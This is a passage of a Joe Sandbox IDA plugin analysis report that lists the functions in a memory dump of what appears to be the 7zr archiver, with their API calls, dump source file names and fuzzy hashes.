                                        • __EH_prolog.LIBCMT ref: 005EBF91
                                          • Part of subcall function 005ED144: __EH_prolog.LIBCMT ref: 005ED149
                                          • Part of subcall function 005A1E40: free.MSVCRT ref: 005A1E44
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                        • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmp
                                        • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: H_prolog$free
                                        • String ID:
                                        • API String ID: 2654054672-0
                                        • Opcode ID: 785371070766aaf91b6e13e3b48eec8c6ff967c206903f282422b0bdea6c560d
                                        • Instruction ID: 14ffde42656e603c759c24f28383f14ffdfb84f8782845fcf33b7bb9cc8e463f
                                        • Opcode Fuzzy Hash: 785371070766aaf91b6e13e3b48eec8c6ff967c206903f282422b0bdea6c560d
                                        • Instruction Fuzzy Hash: CF113A71800B559FC724EF64C909BCEBFF5BF42344F00891CE4A697591D7B1AA08CB84
                                        APIs
                                        • SetFileTime.KERNEL32(00000002,00000000,000000FF,00000000,00000000,80000000,00000000,?,005A1AD1,00000000,00000002,00000002,?,005A7B3E,?,00000000), ref: 005A7AFD
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                        • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmp
                                        • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: FileTime
                                        • String ID:
                                        • API String ID: 1425588814-0
                                        • Opcode ID: ef7f3d59fa45456fe780948c1e5092c70c6735e794d1b45ea6840e45b69a3ad8
                                        • Instruction ID: aec4a0d0ca4ed319891238b5c7f967dc2aab9a4d30d3e48bad5db4e65f62cc43
                                        • Opcode Fuzzy Hash: ef7f3d59fa45456fe780948c1e5092c70c6735e794d1b45ea6840e45b69a3ad8
                                        • Instruction Fuzzy Hash: C001AD7010424DBFEF268F54CC09BEE3FA9AB4A320F148149B8A6532E2D7709E61D760
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 005DC0B8
                                          • Part of subcall function 005C7193: __EH_prolog.LIBCMT ref: 005C7198
                                          • Part of subcall function 005A1E40: free.MSVCRT ref: 005A1E44
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                        • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmp
                                        • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: H_prolog$free
                                        • String ID:
                                        • API String ID: 2654054672-0
                                        • Opcode ID: c36754aa4ec6a03fb1b1e3b2541fd9363fb25971fea46c4f34047792b6cf7029
                                        • Instruction ID: 141dc2f68e2144685a685f50214e7d3e16e53be69a31f8c055eed2b69211b817
                                        • Opcode Fuzzy Hash: c36754aa4ec6a03fb1b1e3b2541fd9363fb25971fea46c4f34047792b6cf7029
                                        • Instruction Fuzzy Hash: 4DF09072900616DBD7259F49D845BAEFFAEFF55760F10042FE50297711CBB29C00C694
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 005E0364
                                          • Part of subcall function 005E01C4: __EH_prolog.LIBCMT ref: 005E01C9
                                          • Part of subcall function 005E0143: __EH_prolog.LIBCMT ref: 005E0148
                                          • Part of subcall function 005A1E40: free.MSVCRT ref: 005A1E44
                                          • Part of subcall function 005E03D8: __EH_prolog.LIBCMT ref: 005E03DD
                                          • Part of subcall function 005E004A: __EH_prolog.LIBCMT ref: 005E004F
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                        • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmp
                                        • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: H_prolog$free
                                        • String ID:
                                        • API String ID: 2654054672-0
                                        • Opcode ID: 91d6054e25d108e73e30a48775e4fa3f4dbf17bb19fde65fef2b0f00407f95b0
                                        • Instruction ID: c73ad74da92cbca5ce67dc2e9af6fbd1ce9114224dca0b7c1a52ec489cab54e2
                                        • Opcode Fuzzy Hash: 91d6054e25d108e73e30a48775e4fa3f4dbf17bb19fde65fef2b0f00407f95b0
                                        • Instruction Fuzzy Hash: B7F0F470914A91DBCB1DEF68C82A39DBFE5BF45314F10465DE492632D2CBF46B048748
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                        • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmp
                                        • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: H_prolog
                                        • String ID:
                                        • API String ID: 3519838083-0
                                        • Opcode ID: 29eadcd587ea944569441cdaa9641a3523add759416fbf8e4fd07e5d98c1d394
                                        • Instruction ID: a552bbc3510e94a51fb4781f302f16660215514fcd24e82063aa6071671b13dc
                                        • Opcode Fuzzy Hash: 29eadcd587ea944569441cdaa9641a3523add759416fbf8e4fd07e5d98c1d394
                                        • Instruction Fuzzy Hash: 6CF08C72E0001AABCB10EF98D8448AEBFB5FF84750F00805AF416A7250CB348A01CB90
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 005E550A
                                          • Part of subcall function 005E4E8A: __EH_prolog.LIBCMT ref: 005E4E8F
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                        • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmp
                                        • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: H_prolog
                                        • String ID:
                                        • API String ID: 3519838083-0
                                        • Opcode ID: ab2ee8aa5dc74855f555d74ee6e1077e76f3589d4abfa7369c6b5949be92bea0
                                        • Instruction ID: c786e28fa0edfc7f8a55cc4f3e6b7dc082c94d6f48a9ed7857ec86ba4d781496
                                        • Opcode Fuzzy Hash: ab2ee8aa5dc74855f555d74ee6e1077e76f3589d4abfa7369c6b5949be92bea0
                                        • Instruction Fuzzy Hash: F0F09B76600515EFCB059F49D815BDE7FBAFF84364F10445AF44297201DB75DD008BA0
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                        • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmp
                                        • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: H_prolog
                                        • String ID:
                                        • API String ID: 3519838083-0
                                        • Opcode ID: 5fd8f623cf7d4ce24edc3f5702c7476ff24b48a482fb804843f39b3137c6c4a2
                                        • Instruction ID: 5ae01a57896015809f5cd88b59cad65918af2875ce547f54ad1815b40425f476
                                        • Opcode Fuzzy Hash: 5fd8f623cf7d4ce24edc3f5702c7476ff24b48a482fb804843f39b3137c6c4a2
                                        • Instruction Fuzzy Hash: 2BE09271A00104EFC704EF98D855F9EBBB9FF48350F10881EF40AD7201C7749900CAA4
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 005E5E30
                                          • Part of subcall function 005E08B6: __aulldiv.LIBCMT ref: 005E093F
                                          • Part of subcall function 005BDFC9: __EH_prolog.LIBCMT ref: 005BDFCE
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                        • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmp
                                        • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: H_prolog$__aulldiv
                                        • String ID:
                                        • API String ID: 604474441-0
                                        • Opcode ID: e339d19b82c850237db32deec39e4164cb67e02378c05552190abf38cb407589
                                        • Instruction ID: 4114e5234e86e87467b4c2e7bf0bb0ba00c19abd1a9bbd5e72758cdf47abcf26
                                        • Opcode Fuzzy Hash: e339d19b82c850237db32deec39e4164cb67e02378c05552190abf38cb407589
                                        • Instruction Fuzzy Hash: CBE039B0E147509FC799EFA9914529EBAF4FB48700F00586EA042D3B81DAB4A9008B90
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 005E8ED6
                                          • Part of subcall function 005E9267: __EH_prolog.LIBCMT ref: 005E926C
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                        • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmp
                                        • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: H_prolog
                                        • String ID:
                                        • API String ID: 3519838083-0
                                        • Opcode ID: ab6a52ff4ec3663454473e315f02c0ed050d5d68ecb321eea20f4f8ecd28269e
                                        • Instruction ID: b45dc1aaa4fa8efdfeab38ecb246442c2d43bc35adc02c56c7c0d819b1b9b4b4
                                        • Opcode Fuzzy Hash: ab6a52ff4ec3663454473e315f02c0ed050d5d68ecb321eea20f4f8ecd28269e
                                        • Instruction Fuzzy Hash: 1FE092719205609ACB1DEB64D526BDDBBA8FF44704F00065DA043A3682CBB46604C781
                                        APIs
                                        • WriteFile.KERNELBASE(?,?,?,?,00000000), ref: 005A7C8B
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                         • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmp
                                         • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: FileWrite
                                        • String ID:
                                        • API String ID: 3934441357-0
                                        • Opcode ID: 86af4cf44c509b970dd8437d85c21bcb8ff46efbb01e04bd0ad876ae241dd7be
                                        • Instruction ID: 241cbd0f0ed94c2c46295ecaff1a3c990627690a150d27e999eb9a40d21be50e
                                        • Opcode Fuzzy Hash: 86af4cf44c509b970dd8437d85c21bcb8ff46efbb01e04bd0ad876ae241dd7be
                                        • Instruction Fuzzy Hash: 7DE0E575600209FBCB11CFA5D801B8E7BB9AB0A765F20C06AF9199A260D7399A50DF54
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 005EBE6E
                                          • Part of subcall function 005E5E2B: __EH_prolog.LIBCMT ref: 005E5E30
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                         • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmp
                                         • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: H_prolog
                                        • String ID:
                                        • API String ID: 3519838083-0
                                        • Opcode ID: 36033453c9feba33f7e703414cd069c0a6508194f2d7f04a1672233236090a00
                                        • Instruction ID: 5addbefc1a8eb5b1fb17ead1595d74d60f2251f5159d9bb7af113b8a6ca9bdd9
                                        • Opcode Fuzzy Hash: 36033453c9feba33f7e703414cd069c0a6508194f2d7f04a1672233236090a00
                                        • Instruction Fuzzy Hash: 10E09B719249A08BD315EB24C0197DDBBA8BF40304F00845EE0D6D3182DFB45A04C795
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                         • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmp
                                         • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: fputs
                                        • String ID:
                                        • API String ID: 1795875747-0
                                        • Opcode ID: 3ac260b762cfdd285a4194f31284226d2c920caaa2022ccf1cfa3f5d0f032eb9
                                        • Instruction ID: 60c334bd3a62b8ed6ba3f01a0cce314bbf074100401a3845824fe7e0272526f5
                                        • Opcode Fuzzy Hash: 3ac260b762cfdd285a4194f31284226d2c920caaa2022ccf1cfa3f5d0f032eb9
                                        • Instruction Fuzzy Hash: D9D01232504119ABCF156B94DC05CDD7BBDFF09214B00441AF541E2151EA75E5148794
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 005DF74A
                                          • Part of subcall function 005DF784: __EH_prolog.LIBCMT ref: 005DF789
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                         • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmp
                                         • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: H_prolog
                                        • String ID:
                                        • API String ID: 3519838083-0
                                        • Opcode ID: fe8500514d84aca70c11d905fcd0e8a5ff56e64909b8b661ab3d4b63cd792f5c
                                        • Instruction ID: 87be3a5e23fa8764bb1d1441fd7841f3c80a3037c1e676c19caef70b0af7fcf5
                                        • Opcode Fuzzy Hash: fe8500514d84aca70c11d905fcd0e8a5ff56e64909b8b661ab3d4b63cd792f5c
                                        • Instruction Fuzzy Hash: A5D012B1E10204BFD7149F49D816BEEBB78EF44754F10052FF00161241C3B55A008AA5
                                        APIs
                                        • ReadFile.KERNELBASE(00000002,?,?,00000000,00000000,00000002,?,005A785F,00000000,00004000,00000000,00000002,?,?,?), ref: 005A7B65
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                         • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmp
                                         • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: FileRead
                                        • String ID:
                                        • API String ID: 2738559852-0
                                        • Opcode ID: d044f2c31cb3cee4c02703ed17ec1827f1176a7e629e4ee54d74f3ce767ddfe7
                                        • Instruction ID: ec2a287fecc33566e461b5ede881a5541ce40f17403e787220941232be4cb271
                                        • Opcode Fuzzy Hash: d044f2c31cb3cee4c02703ed17ec1827f1176a7e629e4ee54d74f3ce767ddfe7
                                        • Instruction Fuzzy Hash: 31E0EC75201208FBDF01CF90CC01F8E7BBAAB49754F208058E90596260C375AA54EB50
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 005F80AF
                                          • Part of subcall function 005A1E0C: malloc.MSVCRT ref: 005A1E1F
                                          • Part of subcall function 005A1E0C: _CxxThrowException.MSVCRT(?,00654B28), ref: 005A1E39
                                          • Part of subcall function 005EBDB5: __EH_prolog.LIBCMT ref: 005EBDBA
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                         • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmp
                                         • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: H_prolog$ExceptionThrowmalloc
                                        • String ID:
                                        • API String ID: 3744649731-0
                                        • Opcode ID: f0d7ea4183e506cb0054635e8789c873ce164f9278fbdfa21770fdc171c1a47d
                                        • Instruction ID: 9f6cf3b85264043894b1a704c0ed3697e7333908ba606eb8c4a5a0cc90a356ac
                                        • Opcode Fuzzy Hash: f0d7ea4183e506cb0054635e8789c873ce164f9278fbdfa21770fdc171c1a47d
                                        • Instruction Fuzzy Hash: 3AD05E71F41506AFDB4CEFB4982A76FBAE6BB84340F00457DA016E3781EF748A008664
                                        APIs
                                        • FindClose.KERNELBASE(00000000,?,005A6880), ref: 005A6853
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                         • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmp
                                         • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: CloseFind
                                        • String ID:
                                        • API String ID: 1863332320-0
                                        • Opcode ID: b462bd38ad070e671c1ce815566fb0b357a2c514953a5ac343d015a6233ac0b0
                                        • Instruction ID: 386ad67cb486c2a9c5b00da4a4d2ebda8bf1456a0d84d807378815298af3e22c
                                        • Opcode Fuzzy Hash: b462bd38ad070e671c1ce815566fb0b357a2c514953a5ac343d015a6233ac0b0
                                        • Instruction Fuzzy Hash: 4CD0123510422246CB645E3D78449C937DD7E077343251759F0B0C31E2E7648C835650
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                         • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmp
                                         • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: fputs
                                        • String ID:
                                        • API String ID: 1795875747-0
                                        • Opcode ID: 84e49a4959018fda5425faf04c885e411446097026268a66594bc81096a2f2d4
                                        • Instruction ID: b4465fe721c7f407cc3cbfbd7790ec8a98a23b7de9e40f26179037729b27d6f2
                                        • Opcode Fuzzy Hash: 84e49a4959018fda5425faf04c885e411446097026268a66594bc81096a2f2d4
                                        • Instruction Fuzzy Hash: 7FD0C7360082519FD7555F05EC09C8BBFA5FFD5330711081FF440521605B625815DA60
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                         • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmp
                                         • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: fputc
                                        • String ID:
                                        • API String ID: 1992160199-0
                                        • Opcode ID: fb35090268d78567ac8a348ad7bae15cfc58848f00b52ca6040341658969e53b
                                        • Instruction ID: 69221636e8e06e0005507930babf564d2cd618e0c68823a5b5ec4a1339201973
                                        • Opcode Fuzzy Hash: fb35090268d78567ac8a348ad7bae15cfc58848f00b52ca6040341658969e53b
                                        • Instruction Fuzzy Hash: 47B092323092209BE7581A9CBC0AAC06795DB0A732B21005BF544C22909A911C818A95
                                        APIs
                                        • SetFileTime.KERNELBASE(?,?,?,?,005A7C65,00000000,00000000,?,005AF238,?,?,?,?), ref: 005A7C49
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                         • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmp
                                         • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: FileTime
                                        • String ID:
                                        • API String ID: 1425588814-0
                                        • Opcode ID: ab09a1ba9efafec8d867db31b384a74ab825fe0e5f6f701b96276d0082c976dd
                                        • Instruction ID: f9a2b449ef07e6fdd86e09067e2eb5b71c97b9f14533a8818442bfd0d0aa2f68
                                        • Opcode Fuzzy Hash: ab09a1ba9efafec8d867db31b384a74ab825fe0e5f6f701b96276d0082c976dd
                                        • Instruction Fuzzy Hash: 40C04C3A159105FFCF020F70CC04C1ABBA2ABA6721F10D918F159C5471C7328034EB02
                                        APIs
                                        • SetEndOfFile.KERNELBASE(?,005A7D81,?,?,?), ref: 005A7D3E
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                         • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmp
                                         • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: File
                                        • String ID:
                                        • API String ID: 749574446-0
                                        • Opcode ID: 83f6157cdaa3a2dc85f50374e3f64f0e5b67fbf6c880ce47b914c2b3488752fc
                                        • Instruction ID: d1300fb67d43e9d63326fa79ca75673aaa809cf76248dc639f176b5627d0c669
                                        • Opcode Fuzzy Hash: 83f6157cdaa3a2dc85f50374e3f64f0e5b67fbf6c880ce47b914c2b3488752fc
                                        • Instruction Fuzzy Hash: 9BA001742A611A8A8F512B74D8098243AA2AA5361676026A4A002CA5B5DA224419AA01
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                         • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmp
                                         • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: memmove
                                        • String ID:
                                        • API String ID: 2162964266-0
                                        • Opcode ID: f9a9da92da83748cfe3c011e47ed75ac2be0701af2f343eac6a09e73a4cba9f0
                                        • Instruction ID: 0b8db74abea4827102254410856ca17ee4b355e12a97c8e33d420e51568d54d5
                                        • Opcode Fuzzy Hash: f9a9da92da83748cfe3c011e47ed75ac2be0701af2f343eac6a09e73a4cba9f0
                                        • Instruction Fuzzy Hash: FF811875E04249AFDF14CFA8C584AAEBFB1FF4A304F14846AE512A7241D771AA84CB64
                                        APIs
                                        • CloseHandle.KERNELBASE(00000000,00000000,005B3D8D,?,00000000,?,?,00000000,00000000,759A8E30), ref: 005B3E12
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                         • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmp
